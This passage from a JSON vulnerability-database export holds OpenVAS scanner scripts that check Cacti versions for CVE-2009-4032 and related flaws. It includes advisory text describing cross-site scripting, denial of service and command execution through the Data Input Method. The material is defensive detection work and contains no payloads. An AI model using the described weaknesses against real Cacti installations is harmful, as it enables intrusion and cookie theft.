FEDORA-2009-12575.\";\n\n\n\nif(description)\n{\n script_id(66584);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-30 21:58:43 +0100 (Wed, 30 Dec 2009)\");\n script_cve_id(\"CVE-2009-4032\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_name(\"Fedora Core 11 FEDORA-2009-12575 (cacti)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=541279\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"cacti\", rpm:\"cacti~0.8.7e~3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-07-02T21:13:48", "bulletinFamily": "scanner", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-12-21T00:00:00", "published": "2009-11-23T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=66300", "id": "OPENVAS:66300", "title": "FreeBSD Ports: cacti", "type": "openvas", "sourceData": "#\n#VID 04104985-d846-11de-84e4-00215af774f0\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 04104985-d846-11de-84e4-00215af774f0\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: cacti\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://docs.cacti.net/#cross-site_scripting_fixes\nhttp://www.vuxml.org/freebsd/04104985-d846-11de-84e4-00215af774f0.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(66300);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_version(\"$Revision: 4824 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-12-21 09:49:38 +0100 (Wed, 21 Dec 2016) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-23 20:51:51 +0100 (Mon, 23 Nov 2009)\");\n script_cve_id(\"CVE-2009-4032\");\n script_name(\"FreeBSD Ports: cacti\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"cacti\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0.8.7e4\")<0) {\n txt += 'Package cacti version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-04-06T11:39:48", "bulletinFamily": "scanner", "description": "The remote host is missing an update to cacti\nannounced via advisory FEDORA-2009-12575.", "modified": "2018-04-06T00:00:00", "published": "2009-12-30T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066584", "id": "OPENVAS:136141256231066584", "title": "Fedora Core 11 FEDORA-2009-12575 (cacti)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_12575.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-12575 (cacti)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nThis fix contains several official patches from cacti:\n Command Line Add Graphs Syntax\n SNMP Invalid Responses \n Template Import/Export Duplication\n Cross-Site Scripting Fixes\nhttp://www.cacti.net/download_patches.php\n\nChangeLog:\n\n* Tue Dec 1 2009 Mike McGrath - 0.8.7e-3\n- Pulling in some official patches\n- #541279\n- #541962\n* Sun Aug 16 2009 Mike McGrath - 0.8.7e-1\n- Upstream released new version\n* Fri Jul 24 2009 Fedora Release Engineering - 0.8.7d-4\n- Rebuilt for https://fedoraproject.org/wiki/Fedora_12_Mass_Rebuild\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update cacti' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-12575\";\ntag_summary = \"The remote host is missing an update to cacti\nannounced via advisory FEDORA-2009-12575.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66584\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-30 21:58:43 +0100 (Wed, 30 Dec 2009)\");\n script_cve_id(\"CVE-2009-4032\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_name(\"Fedora Core 11 FEDORA-2009-12575 (cacti)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=541279\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"cacti\", rpm:\"cacti~0.8.7e~3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-01-19T15:05:06", "bulletinFamily": "scanner", "description": "Check for the Version of cacti", "modified": "2018-01-18T00:00:00", "published": "2010-01-15T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310861611", "id": "OPENVAS:1361412562310861611", "type": "openvas", "title": "Fedora Update for cacti FEDORA-2009-12560", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for cacti FEDORA-2009-12560\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"cacti on Fedora 12\";\ntag_insight = \"Cacti is a complete frontend to RRDTool. It stores all of the\n necessary information to create graphs and populate them with\n data in a MySQL database. The frontend is completely PHP\n driven. Along with being able to maintain graphs, data\n sources, and round robin archives in a database, Cacti also\n handles the data gathering. There is SNMP support for those\n used to creating traffic graphs with MRTG.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2010-January/msg00166.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.861611\");\n script_version(\"$Revision: 8457 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-18 08:58:32 +0100 (Thu, 18 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-01-15 10:29:41 +0100 (Fri, 15 Jan 2010)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_xref(name: \"FEDORA\", value: \"2009-12560\");\n script_cve_id(\"CVE-2009-4032\");\n script_name(\"Fedora Update for cacti FEDORA-2009-12560\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of cacti\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC12\")\n{\n\n if ((res = isrpmvuln(pkg:\"cacti\", rpm:\"cacti~0.8.7e~3.fc12\", rls:\"FC12\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-04-06T11:37:19", "bulletinFamily": "scanner", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2018-04-06T00:00:00", "published": "2009-11-23T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066300", "id": "OPENVAS:136141256231066300", "title": "FreeBSD Ports: cacti", "type": "openvas", "sourceData": "#\n#VID 04104985-d846-11de-84e4-00215af774f0\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 04104985-d846-11de-84e4-00215af774f0\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: cacti\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://docs.cacti.net/#cross-site_scripting_fixes\nhttp://www.vuxml.org/freebsd/04104985-d846-11de-84e4-00215af774f0.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66300\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-23 20:51:51 +0100 (Mon, 23 Nov 2009)\");\n script_cve_id(\"CVE-2009-4032\");\n script_name(\"FreeBSD Ports: cacti\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"cacti\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0.8.7e4\")<0) {\n txt += 'Package cacti version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-12-21T11:33:07", "bulletinFamily": "scanner", "description": "Check for the Version of cacti", "modified": "2017-12-21T00:00:00", "published": "2010-01-15T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=861611", "id": "OPENVAS:861611", "title": "Fedora Update for cacti FEDORA-2009-12560", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for cacti FEDORA-2009-12560\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"cacti on Fedora 12\";\ntag_insight = \"Cacti is a complete frontend to RRDTool. It stores all of the\n necessary information to create graphs and populate them with\n data in a MySQL database. The frontend is completely PHP\n driven. Along with being able to maintain graphs, data\n sources, and round robin archives in a database, Cacti also\n handles the data gathering. There is SNMP support for those\n used to creating traffic graphs with MRTG.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2010-January/msg00166.html\");\n script_id(861611);\n script_version(\"$Revision: 8205 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-21 07:30:37 +0100 (Thu, 21 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-01-15 10:29:41 +0100 (Fri, 15 Jan 2010)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_xref(name: \"FEDORA\", value: \"2009-12560\");\n script_cve_id(\"CVE-2009-4032\");\n script_name(\"Fedora Update for cacti FEDORA-2009-12560\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of cacti\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC12\")\n{\n\n if ((res = isrpmvuln(pkg:\"cacti\", rpm:\"cacti~0.8.7e~3.fc12\", rls:\"FC12\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-07-02T21:14:01", "bulletinFamily": "scanner", "description": "Cacti is prone to multiple HTML-injection vulnerabilities because it\nfails to properly sanitize user-supplied input before using it in\ndynamically generated content.\n\nAttacker-supplied HTML and script code would run in the context of the\naffected browser, potentially allowing the attacker to steal cookie-\nbased authentication credentials or to control how the site is\nrendered to the user. Other attacks are also possible.\n\nCacti 0.8.7e is vulnerable; other versions may be affected as well.", "modified": "2016-11-18T00:00:00", "published": "2009-11-25T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=100361", "id": "OPENVAS:100361", "title": "Cacti Multiple HTML Injection Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: cacti_37109.nasl 4574 2016-11-18 13:36:58Z teissa $\n#\n# Cacti Multiple HTML Injection Vulnerabilities\n#\n# Authors:\n# Michael Meyer\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"Cacti is prone to multiple HTML-injection vulnerabilities because it\nfails to properly sanitize user-supplied input before using it in\ndynamically generated content.\n\nAttacker-supplied HTML and script code would run in the context of the\naffected browser, potentially allowing the attacker to steal cookie-\nbased authentication credentials or to control how the site is\nrendered to the user. Other attacks are also possible.\n\nCacti 0.8.7e is vulnerable; other versions may be affected as well.\";\n\n\ntag_solution = \"A patch is available. Please see the references for details.\";\n\nif (description)\n{\n script_id(100361);\n script_version(\"$Revision: 4574 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-11-18 14:36:58 +0100 (Fri, 18 Nov 2016) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-25 11:49:08 +0100 (Wed, 25 Nov 2009)\");\n script_cve_id(\"CVE-2009-4032\");\n script_bugtraq_id(37109);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n\n script_name(\"Cacti Multiple HTML Injection Vulnerabilities\");\n\n script_xref(name : \"URL\" , value : \"http://www.securityfocus.com/bid/37109\");\n script_xref(name : \"URL\" , value : \"http://cacti.net/\");\n script_xref(name : \"URL\" , value : \"http://docs.cacti.net/#cross-site_scripting_fixes\");\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2009 Greenbone Networks GmbH\");\n script_dependencies(\"cacti_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"version_func.inc\");\n\nport = get_http_port(default:80);\nif(!get_port_state(port))exit(0);\n\nif(!can_host_php(port:port)) exit(0);\n\nif(!version = get_kb_item(string(\"www/\", port, \"/cacti\")))exit(0);\nif(!matches = eregmatch(string:version, pattern:\"^(.+) under (/.*)$\"))exit(0);\n\nvers = matches[1];\n\nif(!isnull(vers) && vers >!< \"unknown\") {\n\n if(version_is_equal(version: vers, test_version: \"0.8.7e\")) {\n security_message(port:port);\n exit(0);\n } \n\n} \n\nexit(0);\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-07-24T12:56:53", "bulletinFamily": "scanner", "description": "The remote host is missing an update to cacti\nannounced via advisory DSA 1954-1.", "modified": "2017-07-07T00:00:00", "published": "2009-12-30T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=66592", "id": "OPENVAS:66592", "title": "Debian Security Advisory DSA 1954-1 (cacti)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1954_1.nasl 6615 2017-07-07 12:09:52Z cfischer $\n# Description: Auto-generated from advisory DSA 1954-1 (cacti)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities have been found in cacti, a frontend to rrdtool\nfor monitoring systems and services. The Common Vulnerabilities and\nExposures project identifies the following problems:\n\nCVE-2007-3112, CVE-2007-3113\n\nIt was discovered that cacti is prone to a denial of service via the\ngraph_height, graph_width, graph_start and graph_end parameters.\nThis issue only affects the oldstable (etch) version of cacti.\n\nCVE-2009-4032\n\nIt was discovered that cacti is prone to several cross-site scripting\nattacks via different vectors.\n\nCVE-2009-4112\n\nIt has been discovered that cacti allows authenticated administrator\nusers to gain access to the host system by executing arbitrary commands\nvia the Data Input Method for the Linux - Get Memory Usage setting.\n\nThere is no fix for this issue at this stage. Upstream will implement a\nwhitelist policy to only allow certain safe commands. For the moment,\nwe recommend that such access is only given to trusted users and that\nthe options Data Input and User Administration are otherwise\ndeactivated.\n\n\nFor the oldstable distribution (etch), these problems have been fixed in\nversion 0.8.6i-3.6.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 0.8.7b-2.1+lenny1.\n\nFor the testing distribution (squeeze), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 0.8.7e-1.1.\n\n\nWe recommend that you upgrade your cacti packages.\";\ntag_summary = \"The remote host is missing an update to cacti\nannounced via advisory DSA 1954-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201954-1\";\n\n\nif(description)\n{\n script_id(66592);\n script_version(\"$Revision: 6615 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:09:52 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-30 21:58:43 +0100 (Wed, 30 Dec 2009)\");\n script_cve_id(\"CVE-2007-3112\", \"CVE-2007-3113\", \"CVE-2009-4032\", \"CVE-2009-4112\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1954-1 (cacti)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"cacti\", ver:\"0.8.6i-3.6\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cacti\", ver:\"0.8.7b-2.1+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:39", "bulletinFamily": "scanner", "description": "The remote host is missing an update to cacti\nannounced via advisory DSA 1954-1.", "modified": "2018-04-06T00:00:00", "published": "2009-12-30T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066592", "id": "OPENVAS:136141256231066592", "title": "Debian Security Advisory DSA 1954-1 (cacti)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1954_1.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory DSA 1954-1 (cacti)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 